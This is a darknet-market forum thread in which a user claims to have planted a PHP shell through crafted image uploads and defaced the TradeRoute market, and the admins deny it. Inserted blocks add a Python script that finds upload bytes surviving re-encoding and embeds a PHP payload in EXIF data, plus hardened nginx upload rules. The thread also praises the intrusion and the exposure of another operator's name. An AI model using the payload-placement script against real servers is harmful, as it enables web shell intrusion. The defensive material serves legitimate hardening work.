TradeRoute Hacked

No response from support for 2 days; the last response completely ignored the fact that I had managed to retrieve sensitive server information. They aren't taking security seriously at all.

I currently have a shell placed on their server executing phpinfo, which returns information on their back-end Apache server. They are running an Nginx front-end as a reverse proxy.

This took a while as I've been attacking their market for a few weeks, but their new request limitations to mitigate DDOS attacks have slowed me down. I asked them to disable this for my session as I had managed to run a PHP shell; however, their image stripping was clearing out my malicious code.

After comparing my original image hex bytes to the uploaded image bytes, there were some of the original bytes in there, so I was able to replace them and test which functions were enabled. Of course, security 101 issue straight away: phpinfo is enabled and happy to serve me with the goodies, mostly server OS information and security patches that had been installed. I am not able to get much further than that due to their directory permissions preventing directory traversal, and most other functions I am unable to exploit. This is a severe security concern though, and I hope they can at least come forward and be transparent. Still working on getting their IP to leak right now, so I will update the thread, also if I hear anything from them.

I have sent proof to the subreddit Mods and will be making further posts. Also not sure if they fixed it yet, because I reported it last week, but you could view anyone's support ticket if you had the ticket ID.

Try not to keep your funds on the market right now if you still choose to use it, they could easily walk away with the money following this.

Edit: I'd like to take this as an opportunity to mention I rooted "Transit Market", which is linked on DDW. It was hosted on the guy's home PC within his user directory, which gave me his first name. Seems like he may have taken the market down, as I can't access it right now; I had also sent proof of this, with my deface page, to the reddit Mods last week.

Edit 2: Managed to upload deface page :) http://traderouteilbgzt.onion/hugbunter.html

Edit 3: SHELL AND DEFACE PAGE WERE JUST REMOVED NOW. Hopefully I get a response from support now.

Edit 4: Response from support completely denying everything and telling me I am spreading FUD, after clearly fixing the issue and removing the shells.

Admin, 22 August 2017 12:46: Why are you spreading FUD about us? It's not possible to show a random html, even if you could put it in the public folder, as the server is configured to show only a few controlled files. Besides, you have no clue about the server software we use, as you showed on reddit. What does the DDOS limitation have to do with image uploads? Complete nonsense; please show a single proof of your claims.

HugBunter, 22 August 2017 13:43: I am not spreading any FUD, and you misunderstood regarding the DDOS limitations and image upload: it was preventing me from attempting different methods quickly in an automated fashion. I can assure you it parsed the html file just fine in the public folder, and you would know, as the file has been removed along with the image shells. Why are you denying it rather than working with me? That's why I contacted you, and had no response. Also, a lot of public details wouldn't be correct, just the way I wouldn't post your IP address publicly even if I had managed to get it to leak. I was trying to help, but insecurities such as this, and then denying it after fixing it, is absurd.

Are you genuinely trying to play this down, or do you have multiple developers and another could have accessed and buried this? I don't understand why you are point blank denying what was publicly proven.
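The post describes the technique only in one sentence: diff the bytes you uploaded against the bytes the server hands back, find the regions that pass through the image pipeline untouched, and put the payload there. The script below is an added example of that round trip done by machine; it is not the author's tooling, and the JPEG builder, the mock re-encoder (which regenerates pixel data and drops comments but copies APP0/APP1 through, the partial stripping the post observed) and all sample bytes are constructed stand-ins for a real upload. The same functions double as a defender's regression test: a pipeline that lets `php_tag_survives` return True for any input is the bug.

```python
"""Which bytes of an upload survive the server's image pipeline?

Added example, not code from the original post. The JPEG builder, the mock
re-encoder and every byte string below are constructed stand-ins for the
real upload round trip.
"""
import re
import struct
from difflib import SequenceMatcher

SOI, EOI, SOS, COM, APP0, APP1 = 0xD8, 0xD9, 0xDA, 0xFE, 0xE0, 0xE1
PHP_TAG = re.compile(rb"<\?(?:php\b|=)")


def segment(marker: int, payload: bytes) -> bytes:
    """One JPEG marker segment: FF, marker, 2-byte length (counts itself), payload."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def split_segments(data: bytes):
    """Minimal JPEG walker returning [(marker, payload)], with the entropy-coded
    scan as (SOS, bytes). Enough for header/APPn/COM segments; not a decoder."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    segs, pos = [(SOI, b"")], 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == EOI:
            segs.append((EOI, b""))
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker == SOS:
            # SOS header, then scan data runs up to the EOI marker
            end = data.rfind(b"\xff\xd9")
            segs.append((SOS, data[pos + 2 + length:end]))
            pos = end
            continue
        segs.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
    return segs


def mock_reencode(data: bytes) -> bytes:
    """Constructed stand-in for a server pipeline: regenerates pixel data, drops
    COM segments, but copies APP0/APP1 (JFIF/EXIF) through untouched."""
    out = b"\xff\xd8"
    for marker, payload in split_segments(data):
        if marker in (SOI, EOI, COM):
            continue
        if marker == SOS:
            fresh = bytes((b * 7 + 3) % 0xFF for b in payload)  # never emits 0xFF
            out += segment(SOS, b"\x01\x01\x00\x00\x3f\x00") + fresh
            continue
        out += segment(marker, payload)
    return out + b"\xff\xd9"


def surviving_runs(original: bytes, processed: bytes, min_len: int = 16):
    """Runs of at least min_len bytes present unchanged in both files, as
    (offset_in_original, offset_in_processed, length): the hex diff by machine."""
    sm = SequenceMatcher(None, original, processed, autojunk=False)
    return [(m.a, m.b, m.size) for m in sm.get_matching_blocks() if m.size >= min_len]


def passthrough_segments(original: bytes, processed: bytes):
    """Markers whose whole segment reappears byte-for-byte in the processed file."""
    return [m for m, p in split_segments(original)
            if m not in (SOI, EOI, SOS) and segment(m, p) in processed]


def php_tag_survives(processed: bytes) -> bool:
    """The check a defender's pipeline test should fail closed on."""
    return PHP_TAG.search(processed) is not None


def build_jpeg(exif_payload: bytes, comment: bytes) -> bytes:
    """Constructed JPEG-shaped file; the scan bytes are filler with no 0xFF."""
    scan = bytes(range(250)) * 2
    return (b"\xff\xd8"
            + segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + segment(APP1, b"Exif\x00\x00" + exif_payload)
            + segment(COM, comment)
            + segment(SOS, b"\x01\x01\x00\x00\x3f\x00") + scan
            + b"\xff\xd9")


def demo():
    # Round 1: inert markers in each candidate segment; see what comes back intact.
    probe = build_jpeg(b"A" * 32, b"B" * 32)
    kept = passthrough_segments(probe, mock_reencode(probe))  # APP0 and APP1 pass; COM and scan do not
    # Round 2: the payload goes into a segment that passed through.
    armed = build_jpeg(b"<?php phpinfo(); ?>", b"")
    return kept, php_tag_survives(mock_reencode(armed))


if __name__ == "__main__":
    kept, survived = demo()
    print("segments passed through:", [hex(m) for m in kept])
    print("PHP tag survives re-encode:", survived)
```

Against a real server, `probe` and `back` are the file you uploaded and the file fetched back from the upload URL; `surviving_runs` then tells you exactly which offsets to target without eyeballing hex dumps. For the defender, the useful assertion is the inverse: re-encode into a fresh file with no metadata copied over, and test that no `<?` ever survives for any input.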


Comments


[125 Points] idevensmokeraisins:

It was hosted on the guys home PC within his user directory, which gave me his first name

jesus christ


[110 Points] iiiiddddd:

Go to TradeRoute they said. Dream is compromised they said. Daily reminder that 99% of the people on this sub-forum don't know shit.


[58 Points] birdtrucker:

Hyuk, Garsh!

Edit I'd like to take this as an opportunity to mention I rooted "Transit Market" which is linked on DDW. It was hosted on the guys home PC within his user directory, which gave me his first name.

God i love this place, endlessly entertaining


[40 Points] PonderingYou:

Best thing I have witnessed HAHA http://i.imgur.com/0vRfXUC.jpg


[28 Points] ice_cream4breakfast:

Fuck, this really sucks. So the darknet totally sucks these days. Wtf are we supposed to do? HugBunter please make us a market.


[21 Points] QEywvcB9utqScJN6:

A message from the TR admins:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hello,

This is an official communication as we see a lot of people believing HugBunter's claims.

The servers haven't been compromised in any way; this guy is just seeking some attention. We have talked to him through a support ticket and he repeatedly failed to provide any proof. If his claims were true he would be able to (at least) provide the version of PHP we use, but he couldn't. So the hack is completely false.

About the deface page, it simply can't be done the way he says. HugBunter's claim is that he created an HTML file of his own inside the public folder of our server and it was accessible from outside by any user. This is completely impossible because our server is configured to only parse a few specific files, and it has always been like this. So placing a random HTML file inside the server folder is not enough; he would need to escalate privileges to change the server's configuration, and he didn't do that, as he clearly states in his reddit post.

Also he claims that we removed the HTML file and his PHP shell. But we didn't do this, as there wasn't any of them on our servers.

Not only is he unable to provide any proof, he's completely wrong about the server software we use, our configuration and generally anything he said in that post.

We have always accepted bugs found in our market and paid serious bounties for them; I see no reason not to do so or to hide any findings. I think people are generally aware that any software has some bugs, and we are eager to find and solve them. Personally I don't care about them going public once they are solved.

I don't know what kind of "proofs" HugBunter provided to the reddit DarknetMarketMods, but they are totally false for sure.

Best regards!
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEUq8osDSa5n6e0We9bW5rE4SjgIAFAlmcVooACgkQbW5rE4Sj
gIBdDgf+K2Hlbym7z8zXMCKA2028OwFcRVD1Gmmetq/rO25b7M+6lybBfTOIK2/w
HzRrE3jA1Id8oUcwvCgVNMvclh/+I4l6kFRhNkPfmWts/2EX1AuD7y/MbqklVGYC
yrL+YJFlemq+RaUnpvqnpsILaKMAaScUvolLOP7cS17n4qJXVRDD7xQChnHN2CQs
o6eiULqeZZgT3Mm/DMhkoyoi4oEzPdG1KsT8QfEroAsCAh71QAfCJODVPAvFm6s1
IMI+FIwuRxBZyRJlLsVPuV1a0LgqipkzGZZbtWgHbt/c9xBagn+RHGXzv7wlKYNo
/5YXhZadZDhZMWXCT6J8kSHDMpw4pw==
=5lvG
-----END PGP SIGNATURE-----


[18 Points] uglygoldfish:

Can you put that in layman's terms please, mate? I do not quite understand the issue.


[15 Points] ThrowitoutASAP:

How do I become as knowledgeable as you?


[13 Points] None:

OP. Do you have autism?


[11 Points] _PrinterPam_:

You "have a shell placed on their server"? What on Earth does that mean? Did you mean to say you were able to create a shell account on the server? No sudo privileges, obviously, since you've already admitted there's not much you can do, because they apparently (from what I'm reading of your post) have solid permissions on the filesystem.

Re: NGINX: And? It's one of the most commonly used reverse proxies/webservers due to its excellent scalability and HA compatibility (even by default, and made better with proper configuration). I use it on my hidden service as well, though I edit the source by hand and compile it to ensure it doesn't easily betray itself (headers and some other stuff). Which, granted, is a good idea... but a motivated adversary, and certainly a state actor, can find ways to identify the software used in any event. I mean, it's not like most attackers don't already use automation to probe for weaknesses in the three big ones anyway. They can stab at all three big flavors (Apache, NGINX, and lighttpd) in not much more time than just hitting one of them. I see this occurring in my logs on a daily basis.

And now, as I'm reading more of your post... basically you're saying the only real thing you've accomplished is that you got some server info via phpinfo, but you haven't been able to do anything with it. So you have not hacked anything. You've perhaps encountered a vulnerability or two with questionable practical applications. No software has ever been, or ever will be, without faults. And what means have you used to determine that you didn't fall into a nice honeypot, meant to send you on a wild goose chase? I'm not saying that's the case, but as I'm not seeing you mention anything in this regard... it's possible you've been duped. I make use of red herrings myself (including, but not limited to, a somewhat difficult to find false IP or two, maybe a fake name or email address or two, etc.). They're quite handy at times.

And sorry, but I just don't buy the "running on a home PC" thing. The number of half-open connections and the huge amount of traffic that market surely has, on any home connection, even if it's a business account with symmetric speeds (not as likely), would bring the service to its knees and leave it there. Even if it's being cached/served out by reverse proxies.

EDIT: Now I see you said "Transit" market for the home PC blurb. Make a different post. Don't go ADD on us on a post about TR by including completely unrelated stuff from another market.


[9 Points] elfer90:

hugbunter needs to make us a secure market


[6 Points] Pelican_Vendor:

rm -rf man..


[7 Points] CookyDough:

We're grateful for all the work you do!


[4 Points] XanaxBoss:

Can any mod confirm the authenticity of this? Why no evidence?


[5 Points] HardC0r3:

you contacted them and they did not answer? I hope they wont exit now....


[4 Points] talkativemonks:

teach me senpai


[3 Points] Those_Good_Vibes:

If you don't break this market (for a few weeks), I'll love you forever and give you mouth hugs <3


[5 Points] HardC0r3:

well thats fuck. Whos next?


[5 Points] 0ni0n3at3r:

Hopefully they get shit together. I was starting to actually like that market


[4 Points] None:

[deleted]


[3 Points] mrmollyboy:

This is going to make me cry.


[3 Points] Axaq:

edit 2 Managed to upload deface page :) http://traderouteilbgzt.onion/hugbunter.html

Now that is just pure evil. Well done sir.


[3 Points] cubegood:

Well, I'm glad I saw this. Was about to deposit tonight and make my first purchase. Thanks for saving me some money.


[2 Points] Bigw0rmer:

I also found a few bugs and let the admin know... they closed the ticket on me. I knew it would be only a matter of time till someone else found them. Ugh, fuck Trade Route, it was true amateur hour over there. One of the bugs I found let me bypass the crawl ban and index the whole site, meaning I have an exact working copy of Trade Route.


[2 Points] dts-NOW:

The fact that they are thwarting your efforts and you haven't really achieved anything is a credit to the market, to be honest. I understand your want for transparency, but put yourself in their position: surely you would secure your own server before wasting time coming on reddit to talk? Damage limitation and plugging holes should be the main priority for anyone under attack, in my opinion. Action first, talk later. That being said, I do hope they come clean about the situation and reply to you after this round is over.


[2 Points] LegendaryPainTrain:

Maybe now everyone will think twice before using PHP.


[3 Points] weeeeee6:

Anyone have a screenshot of hugbunter.html ? i would like to see what it looked like


[2 Points] None:

something is rotten in the state of Denmark


[2 Points] mrfloridamolly99:

Well shit, it had potential :(


[2 Points] KingXombi:

Any confirmation on this? Smh if it's true. Like DHL all over again..


[4 Points] qubesfan:

An old schooler posted here about a year ago discussing how wretched the landscape could be once AB inevitably disappeared because there was no legitimate "heir apparent" capable of rising to the occasion.

He really nailed that prediction.


[2 Points] Gyratetojackjarvis:

Are you worried that by helping these sites LE will somehow connect you to them and cause you legal issues?

I'm sure being a security adviser to a an illegal drug trading platform is a fairly grey area in terms of the law. Although a pretty huge niche in the market so good luck with it!

Just be careful dude and plz don't don't hack me lol


[2 Points] None:

I knew this was going to happen... I just said I was wary of this market yesterday... and this is one of the reasons.


[2 Points] None:

[deleted]


[2 Points] losfalcor:

Excuse me, is OP a hacker testing the security of dark net sites for the good of the community?


[2 Points] Manifest122:

This is ridiculous. They're lucky it was you that decided to poke around and not someone with more malicious intent, and they decided to deny it? Fuck this market, I advise everyone else to steer well clear.


[2 Points] WhewCookie:

I call bullshit


[1 Points] josemoop:

FFS, I forgot my PIN; 5 days till reset, 50 bucks on there ;-; getting fucked with all these markets :(((


[2 Points] DNrick_sanchez:

"Trade Route is best," they all said. I've had a bunch of successful pck rpg'in on Dreamland, and that's the fucked up one round here.

While I agree it's a matter of time before any market goes down, I'll stick to Dream till then, with vendors who know me and PGP encryption, 4096-bit keys, locally encrypted on a nice clean specific Linux distro.


[1 Points] murderhomelesspeople:

Have you ever given Zion market a go?


[1 Points] S0faKin:

Have you tested the security on any others markets apart from TradeRoute?


[1 Points] real_gg249:

SR3.0 Coming soon..just wait on it


[1 Points] yellow_soap:

Belize, Run.


[1 Points] AMPTEST:

I guess at the end of the day, this isn't the end of the world. Just easy to get hyped up after recent events.

Let's not forget how alphabay let all the messages of users and buyers become public not once, but twice.

Or how Dream is a shit show. Your chances on Dream are about the same as ordering NL>US: you just gotta hope it works and they don't steal your money. Not to mention they had a supposedly leaked IP address.

Yes, there are a few problems on the horizon, and there will be a few more. But our attitude towards everything should be how we can make it better instead of worse.

What /u/hugbunter did was look for exploits and he found a few. But I feel like he was trying to shut the whole site down/create fear and panic at the same time.

Maybe he is better at probing the inner workings of a network than he is with his words, but I feel like this could have been taken in a more productive and positive direction from what he found, instead of stepping on the ant pile of DNMers that has already tried to recolonize multiple times this summer.


[1 Points] whatsmynamep:

Have you tried to upload index.html? I bet their config was

index index.html index.php;

Then everybody gets redirected, hehe. You're a cool guy.
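The commenter's guess is the `index` directive; whether TradeRoute's config looked like that the thread never shows. As an added example (not the market's configuration, and with assumed paths: /var/www/market/public as the app's web root and /var/www/market/uploads as where user images land), here is that weak shape beside a hardened one in which an uploaded file can neither become the front page nor reach PHP. Since the post says nginx only fronts an Apache back-end, the same rule (no script handler for the upload directory, no directory index from it) has to hold on Apache as well; this block shows the nginx side only.

```nginx
# Weak: the directive the commenter guesses. Anything dropped into the web
# root is served, and an uploaded index.html wins over index.php for "/".
server {
    root  /var/www/market/public;
    index index.html index.php;
    location / {
        try_files $uri $uri/ /index.php?$args;
    }
    location ~ \.php$ {
        fastcgi_pass unix:/run/php/php-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}

# Hardened: only index.php is an index; uploads live outside the web root,
# are served with a fixed image type and never reach PHP. The ^~ prefix
# location stops the \.php$ regex location from matching under /uploads/.
server {
    root  /var/www/market/public;
    index index.php;
    location ^~ /uploads/ {
        alias /var/www/market/uploads/;
        autoindex off;
        types { image/jpeg jpg jpeg; image/png png; image/gif gif; }
        default_type application/octet-stream;
        add_header X-Content-Type-Options nosniff;
    }
    location / {
        try_files $uri /index.php?$args;
    }
    location ~ \.php$ {
        try_files $uri =404;   # no PHP for paths that do not exist on disk
        fastcgi_pass unix:/run/php/php-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}
```

The `try_files $uri =404;` line in the PHP location is the check that closes the classic "/uploads/shell.jpg/x.php" path-info trick, and the narrow `types` map means a file the pipeline let through with an unexpected extension is downloaded as an opaque blob rather than rendered or executed.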


[1 Points] Nexux720:

I placed an order last night and it says it has been shipped. Should I be worried?


[1 Points] Jackpottino:

Okay, so the admins were douchebags with you but from last edit you wrote now it's safer to use it or not?


[1 Points] JburnaDNM:

Jesus Christ! Good job, I guess lol? We are fucked as a community. Thanks to the Feds and hackers I have been clean for almost 4 months.


[1 Points] DNMTiger:

ugggh, can they please get my two orders shipped before they end up pulling the site dhl style


[1 Points] eyekantbeme:

After I saw the User interface on this site, I stopped browsing it. I just had a bad gut feeling about it. Plus there isnt much selection. Im definitely anticipating that new site you alluded to....A new Agora sounds amazing.


[0 Points] None:

[deleted]


[0 Points] DrLankton:

Everyone knows all these markets suck. It's like they're all run by a bunch of monkeys. Absolutely no knowledge of anything. Very sad that so little effort is put into such an important thing, and the more some of you dumbasses keep accusing OP of FUD and no proof while also supporting these fools, the more things will continue to be the way they are.


[0 Points] bhp5:

You guys take this roleplay thing quite serious, huh?


[0 Points] l33t4ever:

Am I missing something? Why no mention of this at all on the TR forums?


[0 Points] Spicy_Tripp:

Soooo is TR sus? LE involved in running it, possibly? Or do you think they just haven't ironed out security yet (not saying that's good either)... I'm so sketched out about all these markets right now. IDK how Dream is still going strong with all these busts, and then a bunch of new markets come outta nowhere (yeah, it's happened before: markets go down and come back up, but not when there's literally 1-2 huge busts every day for weeks)...


[0 Points] JohnnyYenOnTheDnms:

what kind of cognitive dissonance are you going through to gild the OP?

say wut?

Edit: I'm glad they told you to fuck off as well. Reason being, IF there was a major issue (which I don't think there was), it will be fixed now and life will go on, and people like you will be less inclined to practically force markets to fuck off.

How is killing markets helping the "community" that you say you're looking out for? My ass. It's just assisting the cops and fucking people over, not "saving" them. You're a wolf in sheep's clothing.


[0 Points] Lyzergic:

To be very honest... I noticed that a couple of weeks ago. I didn't wanna fuck it, so I wrote to support as well. Similar story. No response, but I use the market and I figured why ruin a good thing, but kudos for not condemning the market to hell, because it really wouldn't have been very hard.

To tell you the truth, most of the people on here would just shrug. When I wanna get something, I save my favorite vendor's keys, load my account, get what I want, withdraw my coins and kick back and wait for my pack.

Support should really take these things more seriously. At this point, I've come to a point where I assume the market is compromised. Always. I encrypt to my regular vendors' saved keys, and I make sure it's the same key two or three times. Log on, paste the encrypted message, place the order, and get off. My regular choices are FE, and so far I haven't been burned (knock on wood).


[0 Points] artfu1:

Why can't people just leave these sites alone!

fuckers


[-2 Points] trooper0:

OP claims to be advocating for a safer market? What a broke kid! He reached out to these markets he claims to have hacked and demanded some sort of 'ransom', else threatened to expose them. If you're indeed trying to advocate for a safer market as you claim, you should not be blackmailing admins with an intention of exposing them. You should do it voluntarily with a clean motive, showing where the problems are! The moment you ask for money or else you expose, your contribution is useless! And you'll remain broke for a long time.


[-4 Points] iiiiddddd:

Why the fuck would anybody use some random shitty little market that just popped up after the AB/Hansa bust??


[-4 Points] Lucid_Enemy:

It's been an hour, this post has been tagged and YET NO MOD HAS COME FORWARD TO CONFIRM RECEIPT OF PROOF....

Also, I can use buzzwords too... You contradicted yourself several times; I'll point one of them out. Apache (old HTTP daemon) and nginx do the same thing; they also both have the capability to run several instances where one can act as a reverse proxy (don't see why that's even needed, since there isn't a NAT involved).


[-5 Points] 8thaccountbanned:

proof plz or gtfo


[-9 Points] ExplainPls2:

WELL THANKS HUGBUNTER. THANKS A BUNCH. IT'S NOT LIKE SOME OF US DON'T WANT OUR DRUGS NO MATTER WHAT. WAY TO MAKE IT A SAFER PLACE.

/s?


[-8 Points] None:

[deleted]


[-7 Points] None:

[deleted]


[-9 Points] AMPTEST:

Bro, why the fuck are you talking the way you are? This isn't even fit for a coder to read. You're being stupid.


[-16 Points] THE_DEEP_MOB_CONNECT:

You're a piece of shit.